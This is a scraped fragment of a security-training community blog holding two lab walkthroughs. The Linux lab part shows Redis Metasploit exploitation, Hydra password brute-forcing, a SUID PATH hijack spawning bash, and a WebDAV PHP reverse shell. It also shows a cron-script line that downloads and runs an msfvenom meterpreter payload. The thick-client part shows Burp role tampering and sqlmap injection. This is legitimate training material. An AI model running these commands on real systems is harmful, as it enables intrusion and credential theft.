rsivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LVZXNWFsWg?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LVZXNWFsWg?revision=3","title":"image.png","associationType":"BODY","width":1486,"height":501,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUhoUkdYNQ?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUhoUkdYNQ?revision=3","title":"image.png","associationType":"BODY","width":1506,"height":206,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LXdkQ0M0Tw?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LXdkQ0M0Tw?revision=3","title":"image.png","associationType":"BODY","width":1490,"height":823,"altText":""},"BlogTopicMessage:message:1644":{"__typename":"BlogTopicMessage","subject":"The Human Connection Challenge Lab 4: Linux Official Walkthrough Guide","conversation":{"__ref":"Conversation:conversation:1644"},"id":"message:1644","entityType":"BLOG_ARTICLE","eventPath":"category:blogs/community:dnvaw96485board:the-human-connection-blog/message:1644","revisionNum":3,"uid":1644,"depth":0,"board":{"__ref":"Blog:board:the-human-connection-blog"},"author":{"__ref":"User:user:1067"},"teaser@stripHtml({\"removeProcessingText\":true,\"truncateLength\":-1})":"","introduction":"","metrics":{"__typename":"MessageMetrics","views":1193},"postTime":"2025-02-24T01:52:38.456-08:00","lastPublishTime":"2025-02-28T04:15:20.240-08:00","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})":" Time’s Up! Congratulations to everyone who completed Lab 4: Linux from the Human Connection Challenge: Season 1. \n In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! \n This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed. \n Throughout this walkthrough, placeholders will be used for target IPs in brackets, such as <Kali IP> or <Target IP>. Simply replace this with the actual IP of your Kali instance or the specific target. \n With all that considered, let's get started. \n Overview \n This challenge is in no way linear and you could start with any of the targets listed in the Machines panel. This walkthrough will attack them in order, but it’s up to you which one you try first! \n For privilege escalation techniques, I won’t go through each enumeration step (to keep this walkthrough from being 70 pages long!). I’ll simply talk through the technique that helped escalate privileges. \n Target 1 \n First thing’s first, as with any pen test, Nmap! \n nmap -Pn -sVTC -p- <Target 1 IP> \n Here’s a breakdown of the flags used in this command: \n \n -Pn: Skip ping scanning \n -sVTC: Service (V)ersioning, (T)CP scanning, Default S(C)ripts \n -p-: All ports (1-65535) \n \n \n Scanning all ports reveals that a Redis server is running version 4.0.1 on the target host. Since you have a version number, the next step is to identify any public exploits you could use. \n A quick Google search for the version reveals there is a Metasploit module available for this. \n \n First, fire up Metasploit as root with: \n sudo msfconsole \n Then, set all the necessary parameters needed for the exploit: \n set srvhost <Kali IP>\n\nset lhost <Kali IP>\n\nset rhosts <Target 1 IP> \n Then simply run the module. \n \n Since the module was successful, you’ll get a connection back to your Kali machine’s listener. \n Dropping into a shell reveals that you are root, and you can read the token to complete the first Target. \n \n Target 2 \n Initial access \n Back to square one. Since you don’t know anything about the second target, you must Nmap it and see what services it’s running. \n nmap -Pn -sVTC -p- <Target 2 IP> \n Since the only running service is SSH and the version doesn’t look like it would be vulnerable to any known exploits, you can attempt to connect to it and hope to gather more information. \n ssh <Target 2 IP> \n \n The SSH banner mentions the system is “reserved for john and friends”. Even though you aren’t friends with john, you now know that “john” is a valid system user so you can attempt a dictionary attack against this user. \n hydra -l john -P /usr/share/wordlists/metasploit/burnett_top_500.txt ssh://<Target 2 IP> \n The dictionary attack will reveal a valid password, trustno1. You can now use this password to log in as john over SSH and get the low-level token. \n ssh john@<Target 2 IP> \n Privilege escalation \n Now that you have access to the target, you can attempt to escalate your privileges. \n One of the methods is to find SUID binaries owned by root. These are binaries that can be executed with the privileges of their owner. If you can find one that uses another binary from the $PATH variable, you could exploit this behavior to escalate your privileges. \n find /usr/local/bin -perm -4000 \n Checking for SUID binaries reveals /usr/local/bin/ls-lh. \n \n After dumping the strings of this binary, you can see that it uses ls from $PATH. \n \n This is extremely dangerous, as any user could escalate privileges by creating a binary called ls, adding it to a writable directory, and exporting their PATH to first contain this directory before anything else. And that’s precisely what you’ll do to exploit this! \n First, create a file in /tmp called ls.c. \n touch /tmp/ls.c \n Then, add the following code that will spawn bash when run: \n #include <stdlib.h>\n\nint main(){ \n\n system(\"/bin/bash\");\n\n} \n Finally, compile this to /tmp/ls, add /tmp as the first location of the PATH variable, and run the original SUID binary. \n gcc -o /tmp/ls /tmp/ls.c\n\nexport PATH=/tmp:$PATH\n\nls-lh /root \n Target 3 \n Initial access \n Again, start with an Nmap scan to see what services are running on the target host. \n nmap -Pn -sVTC -p- <Target 3 IP> \n You can see from the output that the target is running an Apache webserver titled anna’s website. \n You can extend your Nmap command to run all HTTP scripts that don’t attempt brute forcing or DoS-ing against the target and try to uncover more information. \n nmap -Pn -sVTC --script=\"http* and not(brute or dos)\" <Target 3 IP> \n This reveals that the target is running webdav. \n \n However, the status code returned is 401, which means you need valid credentials to access this. You know the username is anna, you just need to find the password. \n hydra -l anna -P /usr/share/wordlists/metasploit/burnett_top_500.txt -f <Target 3 IP> http-get /webdav \n This command reveals the password 123456. \n Unfortunately, your Kali instance doesn’t have a webdav client such as cadaver, but creativity is part of a pen tester’s job! \n Instead, use Metasploit’s windows/http/xampp_webdav_upload_php to get a reverse shell. Even though the target is Linux, this will still work because it uploads PHP. However, while the exploit is running, you must access the uploaded file manually to trigger it. \n use windows/http/xampp_webdav_upload_php\n\nset rhosts <Target 3 IP>\n\nset filename shell.php\n\nset username anna\n\nset password 123456\n\nexploit \n Once the exploit module is triggered, you can access the uploaded file from a different terminal: \n wget http://anna:123456@<Target 3 IP>/webdav/shell.php \n And, of course, this triggers the reverse shell and you get a connection back to your Metasploit listener. \n \n Privilege escalation \n Checking crontab, you can see there is a recurring job run by root that clears webdav. \n \n The permissions on this file allow it to be modified by anyone. \n \n At this point, you could, in theory, just make it read the root token into a world-readable file and finish the challenge. But did you really hack it if you don’t have interactive access? \n First, generate a reverse shell using msfvenom: \n msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f elf > shell.elf \n Then, serve it using Python: \n sudo python -m http.server 80 \n Then, set up your Metasploit listener (since the port is 443, remember to run Metasploit as root): \n use multi/handler\n\nset payload linux/x64/meterpreter/reverse_tcp\n\nset lport 443\n\nset lhost <Kali IP>\n\nexploit \n And finally, you can modify the file run by the cron job to trigger your exploit. \n echo “wget http://<Kali IP>/shell.elf; chmod +x shell.elf; ./shell.elf” > /tmp/clear-dav.sh \n Once the job is triggered, it first downloads the file from your HTTP server. \n \n Then, you get a connection back to your Metasploit listener. \n \n Tools \n For this challenge, you’ll use a range of tools including: \n \n Nmap \n Metasploit \n Python \n GCC \n Hydra \n \n Tips \n When testing for vulnerabilities, remember that vulnerabilities may reside in any part of the target infrastructure. Subtle elements that appear unimportant could prove exploitable. So make sure you leave no stone unturned and check every single aspect of the target server. \n To learn more about some of the tools used in this lab, take a look at the following collections: \n \n Moving Around \n Secure Testing: Beginner \n Credential Access \n Privilege Escalation: Linux \n Introduction to Metasploit \n \n Conclusion \n The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done! \n If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below! \n I hope you enjoyed the challenge and are looking forward to the next one, after which I’ll share another walkthrough guide! ","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})@stringLength":"8432","kudosSumWeight":1,"repliesCount":33,"readOnly":false,"images":{"__typename":"AssociatedImageConnection","edges":[{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWNTR1JhRw?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDI","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWhudXVkaQ?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDM","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUpMcXhGUQ?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDQ","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWpwNGJ5aA?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDU","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LVdvSHZSbQ?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDY","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWd5c1RzSA?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDc","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUxKemRMVQ?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDg","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWp6NFFhcA?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDk","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LXdNcGxaMw?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDEw","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUh6SUV0SA?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDEx","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LVlOZ2FmVQ?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDEy","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUJLNVpRZw?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDEz","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LTVTczZxcw?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE0","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LW5RS0xzTA?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE1","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUd0TUhJeg?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE2","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LXNITUcxZQ?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE3","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUxYQ3BRUw?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE4","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LXhERUZLaQ?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE5","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LTRlUE1sbg?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDIw","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWdUN3JiNQ?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDIx","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LVZXNWFsWg?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDIy","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUhoUkdYNQ?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDIz","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LXdkQ0M0Tw?revision=3\"}"}}],"totalCount":23,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"videos":{"__typename":"VideoConnection","edges":[],"totalCount":0,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"coverImage":{"__typename":"UploadedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWNTR1JhRw?revision=3"},"coverImageProperties":{"__typename":"CoverImageProperties","style":"STANDARD","titlePosition":"BOTTOM","altText":""}},"Conversation:conversation:2035":{"__typename":"Conversation","id":"conversation:2035","topic":{"__typename":"BlogTopicMessage","uid":2035},"lastPostingActivityTime":"2025-04-23T01:00:26.445-07:00","solved":false},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LWRQTFN3UA?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LWRQTFN3UA?revision=7","title":"Card_blog.jpg","associationType":"COVER","width":800,"height":800,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LWNaZ1BSag?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LWNaZ1BSag?revision=7","title":"image.png","associationType":"BODY","width":1769,"height":664,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVlKUmIySA?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVlKUmIySA?revision=7","title":"image.png","associationType":"BODY","width":1562,"height":483,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LUxScnRvUA?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LUxScnRvUA?revision=7","title":"image.png","associationType":"BODY","width":1740,"height":937,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LUlJY1pBRg?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LUlJY1pBRg?revision=7","title":"image.png","associationType":"BODY","width":1784,"height":694,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LW5NTG1SMg?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LW5NTG1SMg?revision=7","title":"image.png","associationType":"BODY","width":1581,"height":404,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LW1Jd3JTbA?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LW1Jd3JTbA?revision=7","title":"image.png","associationType":"BODY","width":917,"height":728,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVhyY3hYRA?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVhyY3hYRA?revision=7","title":"image.png","associationType":"BODY","width":1646,"height":878,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVpnenJNNw?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVpnenJNNw?revision=7","title":"image.png","associationType":"BODY","width":1644,"height":1369,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LTZ4ZmdqYQ?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LTZ4ZmdqYQ?revision=7","title":"image.png","associationType":"BODY","width":1773,"height":511,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LTFGc0VzaA?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LTFGc0VzaA?revision=7","title":"image.png","associationType":"BODY","width":1768,"height":356,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LUpUOEhUcw?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LUpUOEhUcw?revision=7","title":"image.png","associationType":"BODY","width":1581,"height":1352,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVFiSHplMw?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVFiSHplMw?revision=7","title":"image.png","associationType":"BODY","width":1748,"height":816,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LW1vemNMTQ?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LW1vemNMTQ?revision=7","title":"image.png","associationType":"BODY","width":1762,"height":449,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVNBeXo2ZA?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVNBeXo2ZA?revision=7","title":"image.png","associationType":"BODY","width":1729,"height":493,"altText":""},"BlogTopicMessage:message:2035":{"__typename":"BlogTopicMessage","subject":"Human Connection Challenge Lab 6: Thick Client Applications Walkthrough Guide (Community Version)","conversation":{"__ref":"Conversation:conversation:2035"},"id":"message:2035","entityType":"BLOG_ARTICLE","eventPath":"category:blogs/community:dnvaw96485board:the-human-connection-blog/message:2035","revisionNum":7,"uid":2035,"depth":0,"board":{"__ref":"Blog:board:the-human-connection-blog"},"author":{"__ref":"User:user:1067"},"teaser@stripHtml({\"removeProcessingText\":true,\"truncateLength\":-1})":"","introduction":"","metrics":{"__typename":"MessageMetrics","views":283},"postTime":"2025-04-22T02:41:46.889-07:00","lastPublishTime":"2025-04-22T02:42:40.471-07:00","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})":" Time’s Up! Congratulations to everyone who completed Lab 6: Thick Client Applications from the Human Connection Challenge: Season 1. \n In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! \n This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed. \n Throughout this walkthrough, placeholders will be used for target IPs in brackets, such as <Kali IP>, <API IP>, or <Thick Client IP>. Simply replace this with the actual IP of your Kali instance or the specific target. \n Let's get started! \n Begin this challenge by setting up your Thick Client application with the API’s IP address. Go to the Remote Data Browser folder , right-click configuration.conf, then click Open with Notepad, and replace the original <IP:5000> with <API IP> or <API IP:80>. \n \n Task 1 \n Task 1 requires you to input a token that you’re meant to receive after you first log in to the Remote Data Browser application with the username and password provided in the Credentials panel. \n However, after logging in, the application doesn’t present any token. \n \n Under normal circumstances, when testing Thick Client applications, you’d have tools like ProcMon running while using the application to check for interactions with the file and operating system. \n In this lab, however, you can simply go back to the Remote Data Browser application’s folder. You’ll see that a token file has been created. Open it to find the token. \n \n Task 2 \n The second task asks for an admin token. However, you can’t access any admin panel through the application’s interface, meaning the role is set on login. \n First, open Burp Suite Community on your Thick Client machine. Then, set your System Proxy as follows: \n \n Go to Proxy settings > Manual proxy setup \n Toggle Use a proxy server to \"on\" \n Set the IP address as 127.0.0.1 \n Set the port as 8080 \n \n \n After everything is set up, turn on the Intercept feature of Burp Suite and log back into the application. \n On the login request, right click anywhere in the request panel and click Do intercept > Response to this request. \n \n This will result in a successful authentication response. It contains a JWT token that can be used in subsequent requests, the username that was used, and the current user’s role. \n \n From the response, you can assume that the API doesn’t tie the role to the session and instead sends it as a parameter to the application. The application then evaluates the role and presents the user with the appropriate panels. Now you can change the role in the response from user to admin. \n \n This will reveal a token in the Remote Data Browser application. \n \n Task 3 \n The final task asks for “the secret token in management”. Again, the application doesn’t offer this option. \n Clicking any of the vehicles, however, results in a Burp Suite request. The application sends this request to the server when selecting the truck option, along with the JWT received during the login phase. \n Since the vehicle parameter is the only one, you should focus on it for your final challenge. \n \n Adding an extra quote (‘) to the vehicle parameter returns the error “SQL query failed”. \n \n You can now safely assume this is vulnerable to SQL injection. Copy the original request into a file, retrieve.sqlmap, in your Kali box, and run sqlmap as follows: \n sqlmap -l retrieve.sqlmap --dump \n After hitting ENTER a few times (accepting SQLmap’s default options), you’ll be presented with your final token. \n \n Tools \n For this challenge, you’ll use a range of tools including: \n \n Burp Suite \n SQLMap \n Kali \n \n Tips \n When testing for Thick Client application vulnerabilities, remember that vulnerabilities may reside in any part of the application. Subtle elements that appear unimportant could prove exploitable if they don’t handle inputs securely. So make sure you check all user input forms and any buttons that direct you to different parts of the application. Although not required for this lab, you should always monitor operating and file system interactions and attempt to decompile the app to uncover all possible attack vectors. \n To learn more about some of the tools used in this lab, take a look at the following collections: \n \n Windows Basics \n Burp Suite Basics \n SQL Injection \n \n Conclusion \n The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done! \n If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below! \n I hope you enjoyed the challenge and are looking forward to the next one, after which I’ll share another walkthrough guide! ","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})@stringLength":"5111","kudosSumWeight":2,"repliesCount":4,"readOnly":false,"images":{"__typename":"AssociatedImageConnection","edges":[{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LWRQTFN3UA?revision=7\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDI","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LWNaZ1BSag?revision=7\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDM","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVlKUmIySA?revision=7\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDQ","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LUxScnRvUA?revision=7\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDU","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LUlJY1pBRg?revision=7\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDY","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LW5NTG1SMg?revision=7\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDc","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LW1Jd3JTbA?revision=7\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDg","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVhyY3hYRA?revision=7\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDk","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVpnenJNNw?revision=7\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDEw","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LTZ4ZmdqYQ?revision=7\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDEx","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LTFGc0VzaA?revision=7\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDEy","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LUpUOEhUcw?revision=7\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDEz","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVFiSHplMw?revision=7\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE0","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LW1vemNMTQ?revision=7\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE1","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LVNBeXo2ZA?revision=7\"}"}}],"totalCount":15,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"videos":{"__typename":"VideoConnection","edges":[],"totalCount":0,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"coverImage":{"__typename":"UploadedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0yMDM1LWRQTFN3UA?revision=7"},"coverImageProperties":{"__typename":"CoverImageProperties","style":"STANDARD","titlePosition":"BOTTOM","altText":""}},"Conversation:conversation:1266":{"__typename":"Conversation","id":"conversation:1266","topic":{"__typename":"BlogTopicMessage","uid":1266},"lastPostingActivityTime":"2025-02-19T02:16:15.460-08:00","solved":false},"User:user:516":{"__typename":"User","uid":516,"login":"BethHolden","registrationData":{"__typename":"RegistrationData","status":null},"deleted":false,"avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/dS01MTYtSXlndmNF?image-coordinates=0%2C5%2C271%2C276"},"id":"user:516"},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMjY2LXRBUWhNRw?revision=7\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/